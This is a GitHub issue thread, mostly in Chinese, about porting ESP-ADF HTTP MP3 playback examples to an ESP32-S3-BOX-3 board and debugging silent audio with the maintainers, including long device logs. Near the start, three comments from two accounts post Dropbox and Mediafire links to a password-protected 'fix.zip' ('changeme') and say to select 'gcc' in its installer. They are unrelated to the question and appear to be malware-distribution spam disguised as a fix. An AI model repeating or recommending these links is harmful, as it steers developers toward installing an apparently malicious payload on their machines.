espressif/esp-adf #1256: 怎样在ESP-BOX-S3开发板esp-box\examples中，整合添加ADF中esp-adf\examples\的模块功能？

yuanfangcn, 2024-08-26:
现有ESP-BOX-S3开发板esp-box-S3，里面有examples\mp3_demo 本地播放MP3例程。
现在需要在此例程上，添加ADF架构中的http在线播放mp3功能：esp-adf\examples\player\pipeline_http_mp3。
也就是 怎样把 esp-adf\examples\player\中的examples 移植整合到 ESP-BOX-S3开发板中的examples中去使用？
求教，感谢。

Dev-Victor-Rodrigues, 2024-08-26:
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

Dev-Victor-Rodrigues, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

Wanderx13, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

hbler99, 2024-08-30:
您可以直接用ADF里面的demo，我们已经支持了ESP32-S3-BOX，您在 menuconfig->Audio HAL->Audio board 直接选中就行

yuanfangcn, 2024-08-30:
我在ADF menuconfig->Audio HAL->Audio board 直接选中编译完升级到ESP32-S3-BOX-3之后，LCD屏幕没有点亮

hbler99, 2024-08-30:
该程序中没有包含使用LCD屏幕的代码，您可以试一下examples/display/music_player进行屏幕使用

hbler99, 2024-08-30:
对的，您可以从中提取出您需要用到的部分在组合起来达到预期效果

yuanfangcn, 2024-08-30:
怎样快捷合并examples里面 各个文件夹，比如既需player，又需cloud_services，还需亮屏display，都要挨个的手动移植添加 合并？

yuanfangcn, 2024-08-30:
[image]

在 examples\player\pipeline_http_mp3 例子下 menuconfig->Audio HAL->Audio board 选择了 esp32_s3_box_3，编译错误

yuanfangcn, 2024-08-30:
在ESP32-S3-BOX-3 运行 pipeline_http_mp3，整个开机信息貌似没有fail，但BOX没有任何MP3播放的声音输出，不知何故，请协助谢谢（有运行过其他example BOX是能发出声音的）

boot: ESP-IDF v5.2.2-dirty 2nd stage bootloader
I (18) boot: compile time Aug 30 2024 17:42:59
I (18) boot: Multicore bootloader
I (22) boot: chip revision: v0.2
I (26) boot.esp32s3: Boot SPI Speed : 80MHz
I (30) boot.esp32s3: SPI Mode       : DIO
I (35) boot.esp32s3: SPI Flash Size : 16MB
I (40) boot: Enabling RNG early entropy source...
I (45) boot: Partition Table:
I (49) boot: ## Label            Usage          Type ST Offset   Length
I (56) boot:  0 nvs              WiFi data        01 02 00009000 00004000
I (64) boot:  1 phy_init         RF data          01 01 0000d000 00001000
I (71) boot:  2 factory          factory app      00 00 00010000 00300000
I (79) boot: End of partition table
I (83) esp_image: segment 0: paddr=00010020 vaddr=3c0c0020 size=32598h (206232) map
I (128) esp_image: segment 1: paddr=000425c0 vaddr=3fc9bd00 size=04d28h ( 19752) load
I (138) esp_image: segment 2: paddr=000472f0 vaddr=40374000 size=08d28h ( 36136) load
I (146) esp_image: segment 3: paddr=00050020 vaddr=42000020 size=bf1cch (782796) map
I (287) esp_image: segment 4: paddr=0010f1f4 vaddr=4037cd28 size=0ef48h ( 61256) load
I (310) boot: Loaded app from partition at offset 0x10000
I (310) boot: Disabling RNG early entropy source...
I (322) cpu_start: Multicore app
I (322) octal_psram: vendor id    : 0x0d (AP)
I (322) octal_psram: dev id       : 0x03 (generation 4)
I (325) octal_psram: density      : 0x05 (128 Mbit)
I (331) octal_psram: good-die     : 0x01 (Pass)
I (336) octal_psram: Latency      : 0x01 (Fixed)
I (341) octal_psram: VCC          : 0x00 (1.8V)
I (346) octal_psram: SRF          : 0x01 (Fast Refresh)
I (352) octal_psram: BurstType    : 0x01 (Hybrid Wrap)
I (358) octal_psram: BurstLen     : 0x01 (32 Byte)
I (364) octal_psram: Readlatency  : 0x02 (10 cycles@Fixed)
I (370) octal_psram: DriveStrength: 0x00 (1/1)
I (375) esp_psram: Found 16MB PSRAM device
I (380) esp_psram: Speed: 40MHz
I (1845) esp_psram: SPI SRAM memory test OK
I (1854) cpu_start: Pro cpu start user code
I (1855) cpu_start: cpu freq: 240000000 Hz
I (1855) cpu_start: Application information:
I (1858) cpu_start: Project name:     play_http_mp3
I (1863) cpu_start: App version:      v2.6-165-ge2186386-dirty
I (1870) cpu_start: Compile time:     Aug 30 2024 17:42:41
I (1876) cpu_start: ELF file SHA256:  2c544b30b...
I (1882) cpu_start: ESP-IDF:          v5.2.2-dirty
I (1887) cpu_start: Min chip rev:     v0.0
I (1892) cpu_start: Max chip rev:     v0.99 
I (1897) cpu_start: Chip rev:         v0.2
I (1902) heap_init: Initializing. RAM available for dynamic allocation:
I (1909) heap_init: At 3FCA4E48 len 000448C8 (274 KiB): RAM
I (1915) heap_init: At 3FCE9710 len 00005724 (21 KiB): RAM
I (1921) heap_init: At 3FCF0000 len 00008000 (32 KiB): DRAM
I (1927) heap_init: At 600FE010 len 00001FD8 (7 KiB): RTCRAM
I (1934) esp_psram: Adding pool of 16384K of PSRAM memory to heap allocator
I (1942) spi_flash: detected chip: gd
I (1946) spi_flash: flash io: dio
W (1950) i2c: This driver is an old driver, please migrate your application code to adapt `driver/i2c_master.h`
I (1961) sleep: Configure to isolate all GPIO pins in sleep state
I (1968) sleep: Enable automatic switching of GPIO sleep configuration
I (1975) main_task: Started on CPU0
I (1985) esp_psram: Reserving pool of 32K of internal memory for DMA/internal allocations
I (1985) main_task: Calling app_main()
I (2015) HTTP_MP3_EXAMPLE: [ 0 ] Start and wait for Wi-Fi network
I (2015) pp: pp rom version: e7ae62f
I (2015) net80211: net80211 rom version: e7ae62f
I (2015) AUDIO_THREAD: The esp_periph task allocate stack on internal memory
I (2025) wifi:wifi driver task: 3fcb8d4c, prio:23, stack:6656, core=0
I (2045) wifi:wifi firmware version: 3e0076f
I (2045) wifi:wifi certification version: v7.0
[... 90 lines cut ...]
I (313355) MP3_DECODER: Closed
I (313365) AUDIO_ELEMENT: IN-[i2s] AEL_IO_DONE,-2
W (313365) HTTP_MP3_EXAMPLE: [ * ] Stop event received
I (313365) HTTP_MP3_EXAMPLE: [ 6 ] Stop audio_pipeline
W (313375) AUDIO_ELEMENT: [http] Element already stopped
W (313375) AUDIO_ELEMENT: [mp3] Element already stopped
W (313385) AUDIO_ELEMENT: [i2s] Element already stopped
W (313395) AUDIO_PIPELINE: There are no listener registered
I (313395) AUDIO_PIPELINE: audio_pipeline_unlinked
W (313405) AUDIO_ELEMENT: [http] Element has not create when AUDIO_ELEMENT_TERMINATE
W (313415) AUDIO_ELEMENT: [i2s] Element has not create when AUDIO_ELEMENT_TERMINATE
W (313415) AUDIO_ELEMENT: [mp3] Element has not create when AUDIO_ELEMENT_TERMINATE
I (313435) wifi:state: run -> init (0)
I (313435) wifi:pm stop, total sleep time: 168070595 us / 311139876 us

I (313435) wifi:<ba-del>idx:1, tid:0
I (313445) wifi:<ba-del>idx:0, tid:6
I (313445) wifi:new:<6,0>, old:<6,0>, ap:<255,255>, sta:<6,0>, prof:1
W (313455) PERIPH_WIFI: Wi-Fi disconnected from SSID ATL-USA-2M, auto-reconnect disabled, reconnect after 1000 ms
I (313465) wifi:flush txq
I (313465) wifi:stop sw txq
I (313465) wifi:lmac stop hw txq
W (313465) PERIPH_WIFI: WiFi Event cb, Unhandle event_base:WIFI_EVENT, event_id:3
I (313475) wifi:Deinit lldesc rx mblock:16
I (313495) main_task: Returned from app_main()

hbler99, 2024-09-02:
很抱歉刚看到您的提问。确实整个log里面没有error， `I (7195) HTTP_STREAM: total_bytes=2994349`该行显示已提取到数据。现在需要看一下播放的时候有没有数据流，可以在
https://github.com/espressif/esp-adf/blob/e27cd5262986dbf93785d44fb71dfa854b8e9763/components/audio_pipeline/audio_element.c#L336
加入打印`ESP_LOGW(TAG, "Data length[%d], name[%s]", el->buf_size, el->tag);`查看是否有数据流动

yuanfangcn, 2024-09-03:
加了，log如下：

I (3905) esp_netif_handlers: sta ip: 192.168.77.179, mask: 255.255.255.0, gw: 192.168.77.1
I (3905) PERIPH_WIFI: Got ip:192.168.77.179
I (3905) HTTP_MP3_EXAMPLE: [ 1 ] Start audio codec chip
I (3915) DRV8311: ES8311 in Slave mode
I (3925) gpio: GPIO[46]| InputEn: 0| OutputEn: 1| OpenDrain: 0| Pullup: 0| Pulldown: 0| Intr:0 
W (3935) I2C_BUS: I2C bus has been already created, [port:0]
I (3935) ES7210: ES7210 in Slave mode
I (3955) ES7210: Enable ES7210_INPUT_MIC1
I (3955) ES7210: Enable ES7210_INPUT_MIC2
I (3955) ES7210: Enable ES7210_INPUT_MIC3
W (3965) ES7210: Enable TDM mode. ES7210_SDP_INTERFACE2_REG12: 2
I (3965) ES7210: config fmt 60
I (3975) AUDIO_HAL: Codec mode is 2, Ctrl:1
I (3975) HTTP_MP3_EXAMPLE: [2.0] Create audio pipeline for playback
I (3975) HTTP_MP3_EXAMPLE: [2.1] Create http stream to read data
I (3985) HTTP_MP3_EXAMPLE: [2.2] Create i2s stream to write data to codec chip
I (3995) HTTP_MP3_EXAMPLE: [2.3] Create mp3 decoder to decode mp3 file
I (3995) MP3_DECODER: MP3 init
I (4005) HTTP_MP3_EXAMPLE: [2.4] Register all elements to audio pipeline
I (4005) HTTP_MP3_EXAMPLE: [2.5] Link it together http_stream-->mp3_decoder-->i2s_stream-->[codec_chip]
I (4015) AUDIO_PIPELINE: link el->rb, el:0x3c110954, tag:http, rb:0x3c111228
I (4025) AUDIO_PIPELINE: link el->rb, el:0x3c1110b8, tag:mp3, rb:0x3c116270
I (4035) HTTP_MP3_EXAMPLE: [2.6] Set up  uri (http as http_stream, mp3 as mp3 decoder, and default output is i2s)
I (4045) HTTP_MP3_EXAMPLE: [ 4 ] Set up  event listener
I (4055) HTTP_MP3_EXAMPLE: [4.1] Listening event from all elements of pipeline
I (4055) HTTP_MP3_EXAMPLE: [4.2] Listening event from peripherals
I (4065) HTTP_MP3_EXAMPLE: [ 5 ] Start audio_pipeline
I (4075) AUDIO_THREAD: The http task allocate stack on external memory
I (4075) AUDIO_ELEMENT: [http-0x3c110954] Element task created
I (4085) AUDIO_THREAD: The mp3 task allocate stack on external memory
I (4095) AUDIO_ELEMENT: [mp3-0x3c1110b8] Element task created
I (4095) AUDIO_THREAD: The i2s task allocate stack on internal memory
I (4105) AUDIO_ELEMENT: [i2s-0x3c110a74] Element task created
I (4115) AUDIO_PIPELINE: Func:audio_pipeline_run, Line:359, MEM Total:16857588 Bytes, Inter:224403 Bytes, Dram:224403 Bytes, Dram largest free:129024Bytes

I (4125) AUDIO_ELEMENT: [http] AEL_MSG_CMD_RESUME,state:1
I (4135) AUDIO_ELEMENT: [mp3] AEL_MSG_CMD_RESUME,state:1
I (4135) MP3_DECODER: MP3 opened
I (4145) wifi:<ba-add>idx:1 (ifx:0, c8:bf:4c:bf:f4:c6), tid:0, ssn:0, winSize:64
I (4155) AUDIO_ELEMENT: [i2s] AEL_MSG_CMD_RESUME,state:1
I (4155) AUDIO_PIPELINE: Pipeline started
W (4195) AUDIO_ELEMENT: Data length[3600], name[i2s]
W (4235) AUDIO_ELEMENT: Data length[3600], name[i2s]
W (4275) AUDIO_ELEMENT: Data length[3600], name[i2s]
W (4315) AUDIO_ELEMENT: Data length[3600], name[i2s]
W (4355) AUDIO_ELEMENT: Data length[3600], name[i2s]
W (4395) AUDIO_ELEMENT: Data length[3600], name[i2s]
W (4435) AUDIO_ELEMENT: Data length[3600], name[i2s]
W (4475) AUDIO_ELEMENT: Data length[3600], name[i2s]
W (4515) AUDIO_ELEMENT: Data length[3600], name[i2s]
W (4555) AUDIO_ELEMENT: Data length[3600], name[i2s]
W (4595) AUDIO_ELEMENT: Data length[3600], name[i2s]
W (4635) AUDIO_ELEMENT: Data length[3600], name[i2s]
W (4675) AUDIO_ELEMENT: Data length[3600], name[i2s]
W (4715) AUDIO_ELEMENT: Data length[3600], name[i2s]
W (4755) AUDIO_ELEMENT: Data length[3600], name[i2s]
W (4795) AUDIO_ELEMENT: Data length[3600], name[i2s]
W (4835) AUDIO_ELEMENT: Data length[3600], name[i2s]
W (4875) AUDIO_ELEMENT: Data length[3600], name[i2s]
W (4915) AUDIO_ELEMENT: Data length[3600], name[i2s]
W (4955) AUDIO_ELEMENT: Data length[3600], name[i2s]
W (4995) AUDIO_ELEMENT: Data length[3600], name[i2s]
W (5035) AUDIO_ELEMENT: Data length[3600], name[i2s]
W (5075) AUDIO_ELEMENT: Data length[3600], name[i2s]
W (5115) AUDIO_ELEMENT: Data length[3600], name[i2s]
W (5155) AUDIO_ELEMENT: Data length[3600], name[i2s]
W (5195) AUDIO_ELEMENT: Data length[3600], name[i2s]
W (5235) AUDIO_ELEMENT: Data length[3600], name[i2s]
[... 67 lines cut ...]
W (7435) AUDIO_ELEMENT: Data length[3600], name[i2s]
W (7435) AUDIO_ELEMENT: Data length[0], name[mp3]
W (7455) AUDIO_ELEMENT: Data length[3600], name[i2s]
W (7465) AUDIO_ELEMENT: Data length[0], name[mp3]
W (7485) AUDIO_ELEMENT: Data length[3600], name[i2s]
W (7505) AUDIO_ELEMENT: Data length[3600], name[i2s]
W (7505) AUDIO_ELEMENT: Data length[0], name[mp3]
W (7525) AUDIO_ELEMENT: Data length[3600], name[i2s]
W (7525) AUDIO_ELEMENT: Data length[0], name[mp3]
W (7545) AUDIO_ELEMENT: Data length[3600], name[i2s]
W (7545) AUDIO_ELEMENT: Data length[0], name[mp3]
W (7565) AUDIO_ELEMENT: Data length[3600], name[i2s]
W (7565) AUDIO_ELEMENT: Data length[0], name[mp3]
W (7585) AUDIO_ELEMENT: Data length[3600], name[i2s]
W (7605) AUDIO_ELEMENT: Data length[3600], name[i2s]
W (7605) AUDIO_ELEMENT: Data length[0], name[mp3]
W (7625) AUDIO_ELEMENT: Data length[3600], name[i2s]
W (7625) AUDIO_ELEMENT: Data length[0], name[mp3]
W (7645) AUDIO_ELEMENT: Data length[3600], name[i2s]
W (7645) AUDIO_ELEMENT: Data length[0], name[mp3]
W (7665) AUDIO_ELEMENT: Data length[3600], name[i2s]
W (7685) AUDIO_ELEMENT: Data length[3600], name[i2s]
W (7685) AUDIO_ELEMENT: Data length[0], name[mp3]
W (7705) AUDIO_ELEMENT: Data length[3600], name[i2s]
W (7705) AUDIO_ELEMENT: Data length[0], name[mp3]

hbler99, 2024-09-03:
我测试了下我们这边的ESP32-S3-BOX-3，这个demo是有声音正常播放的。您那边使用的IDF和ADF版本分别是？或者有其他的ESP32-S3-BOX-3测试下是不是板子问题？

yuanfangcn, 2024-09-03:
ESP-IDF v5.2.2-dirty

至于ADF版本，怎么查？当前分支和Log是：

λ git branch
* master

λ git log
commit e218638621d421eacb78b79179bde6c1710393b4 (HEAD -> master, origin/master, origin/HEAD)
Merge: 717d8040 b0417c76
Author: Jason-mao <maojianxin@espressif.com>
Date:   Wed Aug 21 15:02:12 2024 +0800

    Merge branch 'feature/update_esp_adf_libs_to_v1.8.0' into 'master'

    esp-adf-libs: Update to v1.8.0

    See merge request adf/esp-adf-internal!1323

yuanfangcn, 2024-09-03:
> 我测试了下我们这边的ESP32-S3-BOX-3，这个demo是有声音正常播放的。您那边使用的IDF和ADF版本分别是？或者有其他的ESP32-S3-BOX-3测试下是不是板子问题？

---> 编译和烧录了esp-box\examples\chatgpt_demo 是有相关 语音类的声音的。

hbler99, 2024-09-03:
在这里加个打印看下，确认PA被使能，如果有万用表也可以看一下对应引脚的电压。现在看下来从网上那数据到数据流传递应该是没问题的，看看是不是播放那边的问题。
https://github.com/espressif/esp-adf/blob/e27cd5262986dbf93785d44fb71dfa854b8e9763/components/audio_hal/driver/es8311/es8311.c#L290

yuanfangcn, 2024-09-03:
I (3815) PERIPH_WIFI: Got ip:192.168.77.179
I (3815) HTTP_MP3_EXAMPLE: [ 1 ] Start audio codec chip
I (3825) DRV8311: ES8311 in Slave mode
I (3835) gpio: GPIO[46]| InputEn: 0| OutputEn: 1| OpenDrain: 0| Pullup: 0| Pulldown: 0| Intr:0 
**I (3845) DRV8311: es8311_pa_power: 1**
W (3845) I2C_BUS: I2C bus has been already created, [port:0]

是说测量 这个PIN嘛？
#define PA_ENABLE_GPIO            GPIO_NUM_46

yuanfangcn, 2024-09-03:
能否把你的play_http_mp3.bin 我直接烧录下试试

hbler99, 2024-09-03:
[play_http_mp3.zip](https://github.com/user-attachments/files/16845700/play_http_mp3.zip)
`#define PA_ENABLE_GPIO GPIO_NUM_46` 你也可以在电路原理图找一下对应的引脚https://github.com/espressif/esp-box/blob/master/docs/hardware_overview/esp32_s3_box_3/hardware_overview_for_box_3.md

yuanfangcn, 2024-09-04:
下载试过了那play_http_mp3.bin，由于wifi ip不同，不过没法连接播放。
ESP-BOX-3代码中的 PA使能引脚也是 这个#define PA_ENABLE_GPIO GPIO_NUM_46
esp-box\examples\chatgpt_demo 是有相关 语音类的声音的
而ADF中 example中我这ESP-BOX-3 还是没有找出 无声 的原因，继续请求支援，谢谢

hbler99, 2024-09-08:
您测试过这个demo  [play_mp3_control](https://github.com/espressif/esp-adf/tree/master/examples/get-started/play_mp3_control)么，看看播放本地的文件有无声音

yuanfangcn, 2024-09-11:
编译和烧录demo play_mp3_control，板型有选: Audio board (ESP32-S3-BOX-3) ，仍然是无声的，目测log显示能播放：

I (22) boot: ESP-IDF v5.2.2-dirty 2nd stage bootloader
I (23) boot: compile time Sep 11 2024 14:27:04
I (23) boot: Multicore bootloader
I (26) boot: chip revision: v0.2
I (30) boot.esp32s3: Boot SPI Speed : 80MHz
I (35) boot.esp32s3: SPI Mode       : DIO
I (39) boot.esp32s3: SPI Flash Size : 16MB
I (44) boot: Enabling RNG early entropy source...
I (50) boot: Partition Table:
I (53) boot: ## Label            Usage          Type ST Offset   Length
I (60) boot:  0 nvs              WiFi data        01 02 00009000 00006000
I (68) boot:  1 phy_init         RF data          01 01 0000f000 00001000
I (75) boot:  2 factory          factory app      00 00 00010000 00100000
I (83) boot: End of partition table
I (87) esp_image: segment 0: paddr=00010020 vaddr=3c040020 size=8e30ch (582412) map
I (161) esp_image: segment 1: paddr=0009e334 vaddr=3fc95b00 size=01ce4h (  7396) load
I (167) esp_image: segment 2: paddr=000a0020 vaddr=42000020 size=380c8h (229576) map
I (193) esp_image: segment 3: paddr=000d80f0 vaddr=3fc977e4 size=01078h (  4216) load
I (194) esp_image: segment 4: paddr=000d9170 vaddr=40374000 size=11a94h ( 72340) load
I (217) boot: Loaded app from partition at offset 0x10000
I (217) boot: Disabling RNG early entropy source...
I (228) cpu_start: Multicore app
I (238) cpu_start: Pro cpu start user code
I (238) cpu_start: cpu freq: 160000000 Hz
I (238) cpu_start: Application information:
I (241) cpu_start: Project name:     play_mp3_control
I (247) cpu_start: App version:      v2.6-165-ge2186386-dirty
I (253) cpu_start: Compile time:     Sep 11 2024 14:47:07
I (259) cpu_start: ELF file SHA256:  a6765a556...
I (265) cpu_start: ESP-IDF:          v5.2.2-dirty
I (270) cpu_start: Min chip rev:     v0.0
I (275) cpu_start: Max chip rev:     v0.99 
I (280) cpu_start: Chip rev:         v0.2
I (284) heap_init: Initializing. RAM available for dynamic allocation:
I (292) heap_init: At 3FC99450 len 000502C0 (320 KiB): RAM
I (298) heap_init: At 3FCE9710 len 00005724 (21 KiB): RAM
I (304) heap_init: At 3FCF0000 len 00008000 (32 KiB): DRAM
I (310) heap_init: At 600FE010 len 00001FD8 (7 KiB): RTCRAM
I (317) spi_flash: detected chip: gd
I (320) spi_flash: flash io: dio
W (324) i2c: This driver is an old driver, please migrate your application code to adapt `driver/i2c_master.h`
I (335) sleep: Configure to isolate all GPIO pins in sleep state
I (342) sleep: Enable automatic switching of GPIO sleep configuration
I (349) main_task: Started on CPU0
I (359) main_task: Calling app_main()
I (359) PLAY_FLASH_MP3_CONTROL: [ 1 ] Start audio codec chip
W (389) I2C_BUS: I2C bus has been already created, [port:0]
W (409) ES7210: Enable TDM mode. ES7210_SDP_INTERFACE2_REG12: 2
I (429) PLAY_FLASH_MP3_CONTROL: [ 2 ] Create audio pipeline, add all elements to pipeline, and subscribe pipeline event
I (429) PLAY_FLASH_MP3_CONTROL: [2.1] Create mp3 decoder to decode mp3 file and set custom read callback
I (439) PLAY_FLASH_MP3_CONTROL: [2.2] Create i2s stream to write data to codec chip
I (449) PLAY_FLASH_MP3_CONTROL: [2.3] Register all elements to audio pipeline
I (459) PLAY_FLASH_MP3_CONTROL: [2.4] Link it together [mp3_music_read_cb]-->mp3_decoder-->i2s_stream-->[codec_chip]
I (469) PLAY_FLASH_MP3_CONTROL: [ 3 ] Initialize peripherals
I (469) PLAY_FLASH_MP3_CONTROL: [3.1] Initialize keys on board
I (479) PLAY_FLASH_MP3_CONTROL: [ 4 ] Set up  event listener
I (489) PLAY_FLASH_MP3_CONTROL: [4.1] Listening event from all elements of pipeline
I (499) PLAY_FLASH_MP3_CONTROL: [4.2] Listening event from peripherals
W (499) PLAY_FLASH_MP3_CONTROL: [ 5 ] Tap touch buttons to control music player:
W (509) PLAY_FLASH_MP3_CONTROL:       [Play] to start, pause and resume, [Set] to stop.
W (519) PLAY_FLASH_MP3_CONTROL:       [Vol-] or [Vol+] to adjust volume.
I (529) PLAY_FLASH_MP3_CONTROL: [ 5.1 ] Start audio_pipeline
W (529) AUDIO_THREAD: Make sure selected the `CONFIG_SPIRAM_BOOT_INIT` and `CONFIG_SPIRAM_ALLOW_STACK_EXTERNAL_MEMORY` by `make menuconfig`
W (549) AUDIO_ELEMENT: Data length[0], name[mp3]
W (549) AUDIO_ELEMENT: Data length[0], name[mp3]
W (559) AUDIO_ELEMENT: Data length[3600], name[i2s]
W (559) AUDIO_ELEMENT: Data length[0], name[mp3]
W (569) AUDIO_ELEMENT: Data length[0], name[mp3]
I (579) PLAY_FLASH_MP3_CONTROL: [ * ] Receive music info from mp3 decoder, sample_rates=8000, bits=16, ch=2
W (579) AUDIO_ELEMENT: Data length[3600], name[i2s]
W (589) AUDIO_ELEMENT: Data length[0], name[mp3]
W (599) AUDIO_ELEMENT: Data length[3600], name[i2s]
W (599) AUDIO_ELEMENT: Data length[0], name[mp3]
W (609) AUDIO_ELEMENT: Data length[0], name[mp3]
W (719) AUDIO_ELEMENT: Data length[3600], name[i2s]
W (719) AUDIO_ELEMENT: Data length[0], name[mp3]
W (829) AUDIO_ELEMENT: Data length[3600], name[i2s]
W (829) AUDIO_ELEMENT: Data length[0], name[mp3]
W (839) AUDIO_ELEMENT: Data length[0], name[mp3]
W (949) AUDIO_ELEMENT: Data length[3600], name[i2s]
W (949) AUDIO_ELEMENT: Data length[0], name[mp3]
.......

yuanfangcn, 2024-09-11:
> 编译和烧录demo play_mp3_control，板型有选: Audio board (ESP32-S3-BOX-3) ，仍然是无声的，目测log显示能播放：
>
> I (22) boot: ESP-IDF v5.2.2-dirty 2nd stage bootloader I (23) boot: compile time Sep 11 2024 14:27:04 I (23) boot: [...]

这个DEMO，BOX-3的显示屏也是没亮的，也没按键。

yuanfangcn, 2024-09-11:
我这 ESP32-S3-BOX-3：

[image]

yuanfangcn, 2024-09-12:
play_mp3_control 这个有声音

closed 2024-09-14 by yuanfangcn